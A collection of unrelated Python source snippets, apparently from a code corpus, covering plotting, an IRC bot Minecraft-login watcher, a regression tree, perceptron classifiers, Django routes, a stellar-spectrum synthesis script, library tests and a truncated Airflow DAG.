plt.title('Produto Interno Bruto (PIB) \n das 5 maiores cidades do estado de São Paulo', fontsize=14, alpha=0.8)
plt.ylabel('PIB Per Capita em Reais (R$)', fontsize=13, alpha=0.8)
plt.xlabel('Ano', fontsize=13, alpha=0.8)
plt.tick_params(top='off', right='off', labelbottom='on')
plt.show()
|
StarcoderdataPython
|
3229325
|
from qmctorch.utils import (
plot_energy, plot_data, plot_block, plot_walkers_traj)
import matplotlib.pyplot as plt
import numpy as np
print(r" ____ __ ______________ _")
print(r" / __ \ / |/ / ___/_ __/__ ________/ / ")
print(r"/ /_/ / / /|_/ / /__ / / / _ \/ __/ __/ _ \ ")
print(r"\___\_\/_/ /_/\___/ /_/ \___/_/ \__/_//_/ ")
|
StarcoderdataPython
|
3202197
|
<filename>willie/modules/minecraft_logins.py<gh_stars>0
# coding=utf8
"""minecraft_logins.py - Willie module to watch for
users to go online/offline on a minecraft server
Currently gets its data from minecraft dynmap, a bukkit
plugin, but bukkit's future is uncertain, so it won't be
a good source of info for very long.
"""
from __future__ import unicode_literals
import json
from multiprocessing import Process
from willie import web
from willie.module import commands, example, NOLIMIT, interval
def poll_minecraft(bot):
url = bot.config.minecraft.url
try:
minecraft_data = json.loads(web.get(url))
players = [player['name'] for player in minecraft_data['players']]
return players
except Exception as e:
print "Unable to enumerate players: %s" % e
return None
def configure(config):
if config.option('Monitor a minecraft server for logins/logouts?',False):
config.add_section('minecraft')
config.interactive_add('minecraft','url','URL to the Dynmap JSON output (typically http://<minecraft_server>/up/world/world/):','')
config.add_list('minecraft','channels','Channels to display joins/parts to','Channel:')
@interval(15)
def check_for_changed_players(bot):
"""
check to see if any players have joined/left
every 15 seconds
"""
if not (bot.config.has_option('minecraft','url')):
return
if not (bot.config.minecraft.get_list('channels')):
return
channels = bot.config.minecraft.get_list('channels')
players = poll_minecraft(bot)
if players is None:
return
last_onlines = []
try:
last_onlines = bot.memory['last_onlines']
except KeyError:
bot.memory['last_onlines'] = players
last_onlines = players
for pname in players:
if len(pname) > 0:
if pname in last_onlines:
# we've seen this user before
pass
else:
# this user is newly joined
for channel in channels:
bot.msg(channel, "[minecraft] %s joined the server" % pname)
for pname in last_onlines:
if len(pname) > 0:
if pname in players:
# this player is currently online
pass
else:
# this player is no longer online
for channel in channels:
bot.msg(channel, "[minecraft] %s quit the server" % pname)
bot.memory['last_onlines'] = players
@commands('online', 'minecraft')
@example('online - shows which users are logged into the minecraft server')
def who_is_online(bot, trigger):
result = poll_minecraft(bot)
    if result is None:
        onlines = "[minecraft] Couldn't fetch the list of online users. Try again later."
    elif len(result) == 0:
        onlines = "[minecraft] Nobody is currently online."
    else:
        onlines = "[minecraft] Players currently online: %s" % ", ".join(result)
bot.say(onlines)
|
StarcoderdataPython
|
1799107
|
<reponame>AbdoulayeDiop/Regression-Tree<gh_stars>0
import numpy as np
from region import Region1, Region2
class Model():
def __init__(self, minSize, eval, norm, alpha):
self.minSize = minSize
self.axis = None
self.subAxis = None
self.root = None
self.eval = eval
self.norm = norm
self.alpha = alpha
def bestSeparation(self, parentRegion):
opt = np.inf
jOpt = None
sOpt = None
for j in range(len(parentRegion.getPopulation()[0])):
svalues = np.sort(parentRegion.getPopulation()[:, j])
maxs = max(svalues)
n = len(svalues)
while n > 0 and svalues[-1] == maxs:
svalues = svalues[:-1]
n -= 1
for s in svalues:
r1 = Region1(self, j, s, elements=parentRegion.getPopulation())
r2 = Region2(self, j, s, elements=parentRegion.getPopulation())
loss = r1.getLoss(r1.value) + r2.getLoss(r2.value)
if loss < opt:
opt = loss
jOpt = j
sOpt = s
        if jOpt is not None:
r1Opt = Region1(self, jOpt, sOpt, elements=parentRegion.getPopulation())
r2Opt = Region2(self, jOpt, sOpt, elements=parentRegion.getPopulation())
return r1Opt, r2Opt
else:
return None, None
def critereCout(self, t, firstTerm=False):
leaves = t.getLeaves()
s = 0
n = len(leaves)
print("n :", n)
for node in leaves:
s += node.getLoss(node.value)
if not firstTerm:
return s + self.alpha * n
else:
return s
def copy(self, region):
if type(region) == Region1:
r = Region1(self, region.j, region.s, elements=region.getPopulation())
else:
r = Region2(self, region.j, region.s, elements=region.getPopulation())
if not region.is_leaf:
for node in region.children:
newnode = self.copy(node)
newnode.parent = r
return r
def elager(self, t):
tOpt = self.copy(t)
currentTree = self.copy(t)
cOpt = self.critereCout(t)
while not currentTree.is_leaf:
leaves = currentTree.getLeaves()
firstTerm = np.inf
bestIndex = 0
for i in range(0, len(leaves), 2):
p = leaves[i].parent
savechildren = [node for node in p.children]
p.children = []
fs = self.critereCout(currentTree, firstTerm=True)
if fs < firstTerm:
firstTerm = fs
bestIndex = i
p.children = savechildren
leaves[bestIndex].parent.children = []
c = self.critereCout(currentTree)
print("c :", c)
print("cOpt :", cOpt)
if c < cOpt:
print("--------------------------------------------- c :", c)
cOpt = c
tOpt = self.copy(currentTree)
return tOpt
def classify(self, data):
root = Region1(self, 1, np.inf, elements=data)
def divideRecursivelly(region):
if region.getSize() > self.minSize:
print(".................")
r1, r2 = self.bestSeparation(region)
if r1:
r1.parent = region
divideRecursivelly(r1)
r2.parent = region
divideRecursivelly(r2)
divideRecursivelly(root)
root = self.elager(root)
self.root = root
return root
def evaluate(self, elt):
def recEvaluate(region):
if not region.children:
return region
else:
r1, r2 = region.children
if elt[r1.j] <= r1.s:
return recEvaluate(r1)
else:
return recEvaluate(r2)
sol = recEvaluate(self.root)
norm1 = self.norm(elt - sol.value)
norm2 = self.norm(sol.value)
print("region : ", sol, " acc : ", 1 - norm1 / norm2)
return sol
def evaluate2(self, elements):
solList = []
loss = 0
def recEvaluate(elt, region):
if not region.children:
return region
else:
r1, r2 = region.children
if elt[r1.j] <= r1.s:
return recEvaluate(elt, r1)
else:
return recEvaluate(elt, r2)
for elt in elements:
sol = recEvaluate(elt, self.root)
solList.append(sol.value)
loss += self.norm(self.eval(elt) - sol.value)
loss = loss / len(elements)
print("loss : ", loss)
return solList, loss
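# Illustrative sketch, not part of the original module: one way the Model class might be
# wired up on a toy dataset. The eval/norm callables, minSize and alpha values are all
# assumptions; the real project supplies its own.
if __name__ == "__main__":
    toy_data = np.random.rand(200, 3)
    model = Model(minSize=20,
                  eval=lambda x: x,          # identity target, purely for illustration
                  norm=np.linalg.norm,
                  alpha=0.1)
    tree = model.classify(toy_data)
    model.evaluate2(toy_data[:10])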
|
StarcoderdataPython
|
1706908
|
def test_cli_version(cliapp):
from uns import __version__
s, o, e = cliapp()
assert e == ''
assert s == 0
assert o.startswith('usage: uns [-h] [-v]')
s, o, e = cliapp('--version')
assert s == 0
assert o.startswith(__version__)
s, o, e = cliapp('-v')
assert s == 0
assert o.startswith(__version__)
|
StarcoderdataPython
|
79063
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 28 17:57:57 2017
@author: pipolose
"""
from polyML.plot_overlay import plot_n_save_3plane
import matplotlib.pyplot as plt
from matplotlib import cm
in_dict = {}
in_dict['do_save'] = True # True #
in_dict['formats_used'] = ['pdf', 'png']
in_dict['out_dir'] = '/data1/polo/figures'
pv = []
'''
Plot median log degree wilcoxon
'''
in_dict['in_dir'] = ('/data1/polo/code/MLtool/TON_resting_classification/2016_Q4/paper_volumes/TON_Resting_State_bct_degrees_log_norm_mean_happy_sad')
in_dict['in_fn'] = 'bct_degrees_log_PC_0_pmap_FDRmasked.nii.gz'
in_dict['cut_coords'] = [-55, -40, 1]#[20, 3, -5]
in_dict['area'] = 'L-STS'
in_dict['threshold']=0
in_dict['symmetric_cbar'] = True
pv.append(plot_n_save_3plane(in_dict))
'''
Plot mean logistic weights
'''
in_dict['in_dir'] = ('/data1/chdi_results/polo/polyML/results/degree/bct/thres07/non_smooth/happy_sad/PC_0')
in_dict['in_fn'] = 'SAGA_log_elastic_weight_nfolds_51.nii.gz'
in_dict['cut_coords'] = [-55, -40, 1]
in_dict['area'] = 'L-STS'
in_dict['threshold'] = 2.5
in_dict['symmetric_cbar'] = True
pv.append(plot_n_save_3plane(in_dict))
#'''
#Plot mean logistic weights
#'''
#in_dict['in_dir'] = ('/data1/chdi_results/polo/polyML/results/'
# 'degree/bct/thres07/non_smooth/age-sex-corrected')
#in_dict['in_fn'] = 'SAGA_log_elastic_selection_freq_nfolds_153.nii.gz'
#in_dict['cut_coords'] = [18, 3, -2]
#in_dict['area'] = 'pallidum'
#in_dict['threshold'] = .999
#in_dict['symmetric_cbar'] = False
#in_dict['cmap'] = cm.autumn
#pv.append(plot_n_save_3plane(in_dict))
|
StarcoderdataPython
|
3293056
|
<gh_stars>0
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^recibidos/listar', views.recibidosListar, name='recibidos-listar'),
url(r'^recibidos/facturar', views.recibidosFacturar, name='recibidos-facturar'),
url(r'^gastos/', views.gastos, name='gastos'),
url(r'^factura/(?P<pk>\d+)/', views.factura, name='factura'),
url(r'^print/(?P<pk>\d+)/', views.imprimirFactura, name='print'),
url(r'^imprimir-cierre-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.imprimirCierreMes, name='imprimir-cierre-mes'),
url(r'^ver-impreso-cierre-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.verImpresoCierreMes, name='ver-impreso-cierre-mes'),
url(r'^imprimir-cierre-dia/(?P<day>\d{2})/(?P<month>\d{2})/(?P<year>\d{4})/', views.imprimirCierreDia, name='imprimir-cierre-dia'),
url(r'^ver-impreso-cierre-dia/(?P<day>\d{2})/(?P<month>\d{2})/(?P<year>\d{4})/', views.verImpresoCierreDia, name='ver-impreso-cierre-dia'),
url(r'^escoger-cierre', views.escogerCierre, name='escoger-cierre'),
url(r'^cierre-dia-(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})', views.cierreDia, name='cierre-dia'),
url(r'^cierres-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.cierreMes, name='cierre-mes'),
url(r'^recaudo/(?P<pk>\d+)/', views.recaudo, name='recaudo'),
url(r'^imprimir-recaudo/(?P<pk>\d+)/', views.imprimirRecaudo, name='imprimir-recaudo'),
url(r'^ver-impreso-recaudo/(?P<pk>\d+)/', views.verImpresoRecaudo, name='ver-impreso-recaudo'),
url(r'^escoger-recaudo', views.escogerRecaudo, name='escoger-recaudo'),
url(r'^recaudos/listar/$', views.recaudosListar, name='recaudos-listar'),
url(r'^troregis/$', views.registroUsuario, name='registro'),
]
|
StarcoderdataPython
|
1704064
|
<filename>flowtorch/param.py
# Copyright (c) FlowTorch Development Team. All Rights Reserved
# SPDX-License-Identifier: MIT
from typing import Dict, Optional, Sequence, Tuple
import torch
import torch.nn as nn
class ParamsModuleList(torch.nn.Module):
params_modules: nn.ModuleList
def __init__(
self,
params_modules: Sequence["ParamsModule"],
) -> None:
super().__init__()
self.params_modules = nn.ModuleList(params_modules)
def forward(
self, x: torch.Tensor, context: Optional[torch.Tensor] = None
) -> Sequence[Optional[Sequence[torch.Tensor]]]:
return [p.forward(x, context=context) for p in self.params_modules]
def __iter__(self):
return iter(self.params_modules)
def __call__(self):
return self.params_modules
def __len__(self):
return len(self.params_modules)
def __reversed__(self):
return reversed(self.params_modules)
class ParamsModule(torch.nn.Module):
def __init__(
self,
params: "Params",
modules: Optional[nn.ModuleList] = None,
buffers: Optional[Dict[str, torch.Tensor]] = None,
) -> None:
super().__init__()
self.params = params
self.mods = modules
if buffers is not None:
for n, v in buffers.items():
self.register_buffer(n, v)
def forward(
self, x: torch.Tensor, context: Optional[torch.Tensor] = None
) -> Optional[Sequence[torch.Tensor]]:
return self.params.forward(x, modules=self.mods, context=context)
class Params(object):
"""
Deferred initialization of parameters.
"""
def __init__(self) -> None:
super().__init__()
def __call__(
self,
input_shape: torch.Size,
param_shapes: Sequence[torch.Size],
context_dims: int,
) -> ParamsModule:
return ParamsModule(self, *self.build(input_shape, param_shapes, context_dims))
def forward(
self,
x: torch.Tensor,
context: Optional[torch.Tensor] = None,
modules: Optional[nn.ModuleList] = None,
) -> Optional[Sequence[torch.Tensor]]:
if context is None:
context = torch.empty(0)
if modules is None:
modules = nn.ModuleList()
return self._forward(x, context=context, modules=modules)
def _forward(
self,
x: torch.Tensor,
context: torch.Tensor,
modules: nn.ModuleList,
) -> Sequence[torch.Tensor]:
"""
Abstract method to ***
"""
raise NotImplementedError
def build(
self,
input_shape: torch.Size,
param_shapes: Sequence[torch.Size],
context_dims: int,
) -> Tuple[nn.ModuleList, Dict[str, torch.Tensor]]:
self.input_shape = input_shape
self.param_shapes = param_shapes
return self._build(input_shape, param_shapes, context_dims)
def _build(
self,
input_shape: torch.Size,
param_shapes: Sequence[torch.Size],
context_dims: int,
) -> Tuple[nn.ModuleList, Dict[str, torch.Tensor]]:
"""
Abstract method to ***
"""
raise NotImplementedError
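# Illustrative sketch, not part of the original module: a minimal Params subclass that
# returns fixed zero tensors of the requested shapes (no modules, no context). The
# shapes used in the usage lines are arbitrary assumptions.
class ConstantParams(Params):
    def _build(self, input_shape, param_shapes, context_dims):
        # no trainable modules or buffers; just remember the requested shapes
        self._values = [torch.zeros(shape) for shape in param_shapes]
        return nn.ModuleList(), {}

    def _forward(self, x, context, modules):
        return [value for value in self._values]


if __name__ == "__main__":
    params_module = ConstantParams()(torch.Size([2]), [torch.Size([2]), torch.Size([2])], 0)
    print(params_module(torch.randn(5, 2)))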
|
StarcoderdataPython
|
3375239
|
<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import zlib
from literate_banana import Bot
LANGUAGES = {
'c': 'c-gcc',
'c#': 'cs-core',
'c++': 'cpp-gcc',
'common lisp': 'clisp',
'groovy': 'groovy',
'go': 'go',
'haskell': 'haskell',
'java': 'java-openjdk9',
'java 8': 'java-openjdk',
'java 9': 'java-openjdk9',
'javascript': 'javascript-node',
'kotlin': 'kotlin',
'lisp': 'clisp',
'mathematica': 'mathematica',
'perl': 'perl6',
'perl 5': 'perl5',
'perl 6': 'perl6',
'php': 'php',
'python': 'python3',
'python 2': 'python2',
'python 3': 'python3',
'ruby': 'ruby',
'rust': 'rust'
}
LANGLIST = [
'C',
'C#',
'C++',
'Common Lisp',
'Groovy',
'Go',
'Haskell',
'Java 8',
'Java 9',
'JavaScript',
'Kotlin',
'Mathematica',
'Perl 5',
'Perl 6',
'PHP',
'Python 2',
'Python 3',
'Ruby',
'Rust'
]
def execute(match, trigger):
try:
req = bytes('Vlang\x001\x00{}\x00F.code.tio\x00{}\x00{}R'.format(
LANGUAGES[match[1].lower()], len(match[2]), match[2]), 'utf-8')
except KeyError:
        return 'Language {} not found. See !languages for a list of languages I support.'.format(match[1])
req = zlib.compress(req)[2:-4]
res = requests.post('https://tio.run/cgi-bin/run/api/', req).text
res = res.split(res[:16])[1:]
if match[0]:
return ['Output:\n' + res[0], 'Debug:\n' + '\n'.join(res[1].splitlines()[:-6])]
return 'Output:\n' + res[0]
def list_languages(match, trigger):
return ', '.join(LANGLIST)
def search_languages(match, trigger):
matches = [i for i in LANGLIST if match[0].lower() in i.lower()]
if matches:
return ', '.join(matches)
else:
return 'No languages matching {}. See !languages for a list of languages I support.'.format(match[0])
TIOBot = Bot(
nick = 'TIOBot',
room = 'xkcd',
short_help = 'I allow easy execution of code online!',
long_help = ('I allow easy execution of code online!\n'
'\n'
'Commands:\n'
' !execute [-d|--debug] <language> -- <code> -> The STDOUT (and STDERR if the debug flag is enabled) output after'
' execution of <code> in <language>.\n'
' !languages -> List of languages that I support.\n'
'\n'
'by totallyhuman\n'
'My source code is here: https://github.com/totallyhuman/TIOBot'
),
generic_ping = 'Pong!',
specific_ping = 'Pong!',
regexes = {
r'(?i)^\s*!execute(\s+(?:-d|--debug))?\s+(.+?)\s*--\s*([\s\S]+?)\s*$': execute,
r'(?i)^\s*!languages\s*$': list_languages,
r'(?i)^\s*!languages\s+(.+?)\s*$': search_languages
}
)
while True:
TIOBot.receive()
|
StarcoderdataPython
|
56283
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# author arrti
from ss_admin import app
if __name__ == '__main__':
app.run()
|
StarcoderdataPython
|
4817957
|
from django.db import models
from accounts.models import CustomUser
import datetime
class Schedule(models.Model):
summary = models.CharField("タイトル ※必須", max_length=25)
date = models.DateField("日付 ※必須")
place = models.CharField("場所", max_length=20, blank=True)
time = models.TimeField("時間", blank=True, null=True)
detail = models.TextField("詳細", blank=True)
owner = models.ForeignKey(CustomUser, on_delete=models.CASCADE, related_name="Schedule_owner")
|
StarcoderdataPython
|
119462
|
"""
Implements the Perception & Adaline Learning Algorithm
Author: <NAME>
Created: May 18, 2010
"""
import numpy as np
import matplotlib.pyplot as plt
class Perception:
"""first artifical neural classifier
Args:
eta: Learning rate (between 0.0 and 1.0)
n_iter: passees over the training set
random_state: Random Number Generator seed
for random weight initilization
Attributes:
w: Weights after fitting
errors: Number of misclassifications(updates) in each epoch
"""
def __init__(self, eta: float = 0.01, n_iter: int = 50, random_state: int = 1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X: np.ndarray, y: np.ndarray) -> 'Perception':
"""fits training data
Args:
X: shape = {n_samples, p_features}
n_samples is number of instances i.e rows
p_features is number of features (the dimension of dataset)
y: shape = {n_samples, 1}
Target values
Returns:
object
"""
# random number gen seed to reproduce values if needed
rgen = np.random.RandomState(self.random_state)
# initialize weights from normal distribution
self.w = rgen.normal(loc=0.0, scale=0.01, size=1+X.shape[1])
self.errors = []
for _ in range(self.n_iter):
errors = 0
# for each instance in training set
for xi, target in zip(X, y):
# calculate the weight update by perception rule
delta_wj = self.eta * (target - self.predict(xi))
# update all weights simultaneously
# given by wj := wj + delta_wj
                self.w[1:] += delta_wj * xi
# since x0 = 1 by construction
self.w[0] += delta_wj
# calculate number of misclassifications
errors += int(delta_wj != 0)
self.errors.append(errors)
return self
def net_input(self, X: np.ndarray) -> np.ndarray:
"""computes the net input vector
z = w1x1 + w2x2 + ... + wpXp
Args:
X: shape = {n_samples, p_features}
n_samples is # of instances
p_features is number of features (dimension of dataset)
Returns:
z: shape = {n_samples, 1}
net input vector
"""
return np.dot(X, self.w[1:]) + self.w[0]
def predict(self, X: np.ndarray) -> float:
"""
computes the classifier phi(z)
where phi(z) = 1 if z:= w'x >=0, -1 otherwise
Args:
X: shape {n_samples, p_features}
Returns:
classifier with value +1 or -1
"""
return np.where(self.net_input(X) > 0, 1, -1)
def plot_misclassifications(self) -> None:
"""plots the misclassifications given the number of epoochs
requires to call the fit() first
"""
try:
            plt.plot(range(1, self.n_iter + 1), self.errors, marker='o')
plt.xlabel("epoch")
plt.ylabel("# of misclassifications")
except AttributeError as e:
print("must call fit() first before plotting misclassifications")
else:
return
class AdalineGD:
"""artificial neural classifier
implemented with gradient descent
Args:
eta: Learning rate (between 0.0 and 1.0)
        n_iter: passes over the training set
        random_state: Random Number Generator seed
        for random weight initialization
    Attributes:
        w: Weights after fitting
        errors: Number of misclassifications (updates) in each epoch
"""
def __init__(self, eta: float = 0.01, n_iter: int = 50, random_state: int = 1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X: np.ndarray, y: np.ndarray) -> 'AdalineGD':
"""fits training data
Args:
X: shape = {n_samples, p_features}
n_samples is number of instances i.e rows
p_features is number of features (the dimension of dataset)
y: shape = {n_samples, 1}
Target values
Returns:
object
"""
# random number gen seed to reproduce values if needed
rgen = np.random.RandomState(self.random_state)
# initialize weights from normal distribution
self.w = rgen.normal(loc=0.0, scale=0.01, size=1+X.shape[1])
self.cost = []
for _ in range(self.n_iter):
# calculate net input
net_input = self.net_input(X)
# calculate the linear activation function phi(z) = w'x = z
output = self.activation(net_input)
errors = y - output
# update the weights
            self.w[1:] += self.eta * X.T.dot(errors)
            self.w[0] += self.eta * errors.sum()
# sse based on J(w) = 1/2 sum(yi - yhat)**2
cost = (errors**2).sum() / 2.0
self.cost.append(cost)
return self
def net_input(self, X: np.ndarray) -> np.ndarray:
"""computes the net input vector
z = w1x1 + w2x2 + ... + wpXp
Args:
X: shape = {n_samples, p_features}
n_samples is # of instances
p_features is number of features (dimension of dataset)
Returns:
z: shape = {n_samples, 1}
net input vector
"""
return np.dot(X, self.w[1:]) + self.w[0]
def activation(self, X: np.ndarray) -> np.ndarray:
"""compute linear activation z = w'x = phi(z)
Args:
X: shape = {n_samples, n_features}
Returns:
the input by itself
"""
return X
def predict(self, X: np.ndarray) -> float:
"""
computes the classifier phi(z)
where phi(z) = 1 if z:= w'x >=0, -1 otherwise
Args:
X: shape {n_samples, p_features}
Returns:
classifier with value +1 or -1
"""
return np.where(self.activation(self.net_input(X)) > 0, 1, -1)
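# Illustrative sketch, not part of the original module: fitting the perceptron classifier
# on a tiny, linearly separable toy problem. The data below is randomly generated.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    X_toy = np.vstack([rng.normal(-2.0, 0.5, (20, 2)),
                       rng.normal(2.0, 0.5, (20, 2))])
    y_toy = np.array([-1] * 20 + [1] * 20)
    clf = Perception(eta=0.1, n_iter=10).fit(X_toy, y_toy)
    print(clf.errors)              # misclassifications per epoch
    print(clf.predict(X_toy[:5]))  # predicted labels for the first five samples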
|
StarcoderdataPython
|
3289845
|
<reponame>StardustDL/Game.GoldenNumber
def adjustNumberInRange(x: float) -> float:
"""Adjust number into range (0,100)"""
if x <= 0:
return 1e-12
if x >= 100:
return 100 - 1e-12
return x
|
StarcoderdataPython
|
120032
|
from __future__ import division
from datetime import timedelta, datetime, tzinfo
if not hasattr(timedelta, 'total_seconds'):
def total_seconds(td):
"Return the total number of seconds contained in the duration for Python 2.6 and under."
return (td.microseconds + (td.seconds + td.days * 86400) * 1e6) / 1e6
else:
total_seconds = timedelta.total_seconds
# Timezone related stuff
# (mostly copied from https://github.com/django/django/blob/master/django/utils/timezone.py)
try:
from django.utils.timezone import now, get_current_timezone
except ImportError:
now = datetime.now
get_current_timezone = lambda: None
|
StarcoderdataPython
|
74975
|
#Execution-3
from fake_news_detection_final_code import *
# main function.
def main():
Training_Validating('fake_news_dataset',130000,400,100,12,64,'x_test_3','y_test_3','history_3','model_3')
Testing('x_test_3','y_test_3','history_3','model_3')
#############################################
# utility function of main.
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
87258
|
<reponame>icryrainix/odil<filename>tests/wrappers/webservices/test_message.py
import unittest
import odil
class TestMessage(unittest.TestCase):
def test_default_constructor(self):
message = odil.webservices.Message()
self.assertEqual(dict(message.get_headers()), {})
self.assertEqual(message.get_body(), "")
def test_full_constructor(self):
message = odil.webservices.Message(headers={"foo": "bar"}, body="body")
self.assertEqual(dict(message.get_headers()), {"foo": "bar"})
self.assertEqual(message.get_body(), "body")
def test_existing_header(self):
message = odil.webservices.Message({"foo": "bar", "plip": "plop"})
self.assertTrue(message.has_header("foo"))
self.assertEqual(message.get_header("foo"), "bar")
def test_missing_header(self):
message = odil.webservices.Message({"foo": "bar", "plip": "plop"})
self.assertFalse(message.has_header("none"))
with self.assertRaises(odil.Exception):
message.get_header("none")
def test_set_headers(self):
message = odil.webservices.Message()
message.set_headers({"foo": "bar", "plip": "plop"})
self.assertEqual(
dict(message.get_headers()), {"foo": "bar", "plip": "plop"})
def test_modify_header(self):
message = odil.webservices.Message({"foo": "bar", "plip": "plop"})
message.set_header("foo", "baz")
self.assertEqual(message.get_header("foo"), "baz")
def test_add_header(self):
message = odil.webservices.Message()
message.set_header("foo", "baz")
self.assertEqual(message.get_header("foo"), "baz")
def test_body(self):
message = odil.webservices.Message()
message.set_body("body")
self.assertEqual(message.get_body(), "body")
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
3345423
|
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tools and methods for quantum information science."""
from cirq.qis.channels import (
kraus_to_channel_matrix,
kraus_to_choi,
operation_to_channel_matrix,
operation_to_choi,
)
from cirq.qis.clifford_tableau import CliffordTableau
from cirq.qis.measures import (
fidelity,
von_neumann_entropy,
)
from cirq.qis.states import (
bloch_vector_from_state_vector,
density_matrix,
density_matrix_from_state_vector,
dirac_notation,
eye_tensor,
infer_qid_shape,
one_hot,
QUANTUM_STATE_LIKE,
QuantumState,
quantum_state,
STATE_VECTOR_LIKE,
to_valid_density_matrix,
to_valid_state_vector,
validate_density_matrix,
validate_indices,
validate_qid_shape,
validate_normalized_state_vector,
)
|
StarcoderdataPython
|
136273
|
<filename>actingweb/__init__.py
__all__ = ["actor", "oauth", "auth", "property", "trust", "config"]
|
StarcoderdataPython
|
3305884
|
<reponame>cclauss/4most-4gp-scripts<gh_stars>0
#!../../../../virtualenv/bin/python3
# -*- coding: utf-8 -*-
# NB: The shebang line above assumes you've installed a python virtual environment alongside your working copy of the
# <4most-4gp-scripts> git repository. It also only works if you invoke this python script from the directory where it
# is located. If these two assumptions are incorrect (e.g. you're using Conda), you can still use this script by typing
# <python synthesize_ges_dwarfs.py>, but <./synthesize_ges_dwarfs.py> will not work.
"""
Take stellar parameters of GES dwarf stars and synthesize spectra using TurboSpectrum.
"""
import json
import logging
import numpy as np
from astropy.io import fits
from lib.base_synthesizer import Synthesizer
# List of elements whose abundances we pass to TurboSpectrum
# Elements with neutral abundances, e.g. LI1
element_list = (
"He", "Li", "C", "O", "Ne", "Na", "Mg", "Al", "Si", "S", "Ca", "Sc", "Ti", "V", "Cr", "Mn", "Co", "Ni", "Cu", "Zn",
"Sr", "Y", "Zr", "Nb", "Mo", "Ru")
# Elements with ionised abundances, e.g. N2
element_list_ionised = ("N", "Ba", "La", "Ce", "Pr", "Nd", "Sm", "Eu", "Gd", "Dy")
# Start logging our progress
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s',
datefmt='%d/%m/%Y %H:%M:%S')
logger = logging.getLogger(__name__)
logger.info("Synthesizing GES dwarf spectra")
# Instantiate base synthesizer
synthesizer = Synthesizer(library_name="ges_dwarf_sample",
logger=logger,
docstring=__doc__)
# Table supplies list of abundances for GES stars
f = fits.open("../../downloads/GES_iDR5_WG15_Recommended.fits")
ges = f[1].data
ges_fields = ges.names
# Obtain solar abundances, needed to convert values in file into solar units
sun_id = np.where(ges.OBJECT == 'Sun_Benchmarks_BordeauxLib3 ')[0]
# Filter objects on SNR
min_SNR = 50
selection = np.where((ges.SNR > min_SNR) & (ges.REC_WG == 'WG11') & (ges.LOGG > 3.5))[0]
stellar_data = ges[selection]
# Loop over stars extracting stellar parameters from FITS file
star_list = []
for star_index in range(len(stellar_data)):
star_list_item = {
"name": stellar_data.CNAME[star_index],
"Teff": float(stellar_data.TEFF[star_index]),
"[Fe/H]": float(stellar_data.FEH[star_index]),
"logg": float(stellar_data.LOGG[star_index]),
"extra_metadata": {
"[alpha/Fe]": float(stellar_data.ALPHA_FE[star_index])
},
"free_abundances": {},
"input_data": {}
}
# Pass list of the abundances of individual elements to TurboSpectrum
free_abundances = star_list_item["free_abundances"]
for elements, ionisation_state in ((element_list, 1), (element_list_ionised, 2)):
for element in elements:
if (not synthesizer.args.elements) or (element in synthesizer.args.elements.split(",")):
fits_field_name = "{}{}".format(element.upper(), ionisation_state)
# Normalise abundance of element to solar
abundance = stellar_data[fits_field_name][star_index] - ges[fits_field_name][sun_id]
if np.isfinite(abundance):
free_abundances[element] = float(abundance)
# Propagate all ionisation states into metadata
metadata = star_list_item["extra_metadata"]
for element in element_list:
abundances_all = []
for ionisation_state in range(1, 5):
fits_field_name = "{}{}".format(element.upper(), ionisation_state)
if fits_field_name in ges_fields:
abundance = stellar_data[fits_field_name][star_index] - ges[fits_field_name][sun_id]
abundances_all.append(float(abundance))
else:
abundances_all.append(None)
metadata["[{}/H]_ionised_states".format(element)] = json.dumps(abundances_all)
# Propagate all input fields from the FITS file into <input_data>
input_data = star_list_item["input_data"]
for col_name in ges_fields:
if col_name == "CNAME":
continue
value = stellar_data[col_name][star_index]
if ges.dtype[col_name].type is np.string_:
typed_value = str(value)
else:
typed_value = float(value)
input_data[col_name] = typed_value
star_list.append(star_list_item)
# Pass list of stars to synthesizer
synthesizer.set_star_list(star_list)
# Output data into sqlite3 db
synthesizer.dump_stellar_parameters_to_sqlite()
# Create new SpectrumLibrary
synthesizer.create_spectrum_library()
# Iterate over the spectra we're supposed to be synthesizing
synthesizer.do_synthesis()
# Close TurboSpectrum synthesizer instance
synthesizer.clean_up()
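# Usage note: the <synthesizer.args.elements> check above implies that the base
# Synthesizer exposes an --elements command-line flag; assuming so, a run
# restricted to magnesium and silicon would look something like
#
#     ./synthesize_ges_dwarfs.py --elements "Mg,Si"
#
# invoked from this script's directory (or via <python synthesize_ges_dwarfs.py>,
# as explained in the shebang note at the top of the file).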
|
StarcoderdataPython
|
1766244
|
# Create a program that reads how much money a person has in their wallet and
# shows how many dollars they can buy. Exchange rate: US$1 = R$3.27
Real = float(input('How much money do you have in your wallet? R$'))
Dolar = Real / 3.27
print(f'With R${Real:.2f} you can buy US${Dolar:.2f}')
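# Worked example (illustrative figures): entering 100.00 prints
# "With R$100.00 you can buy US$30.58", since 100 / 3.27 ≈ 30.58.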
|
StarcoderdataPython
|
136516
|
<gh_stars>0
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator
from datetime import datetime, timedelta
default_args = {
'owner': 'airflow',
'description': 'Wikipedia assistant',
'depends_on_past': False,
'start_date': datetime(2020, 7, 28),
'email': ['<EMAIL>'],
'email_on_failure': False,
'email_on_retry': False,
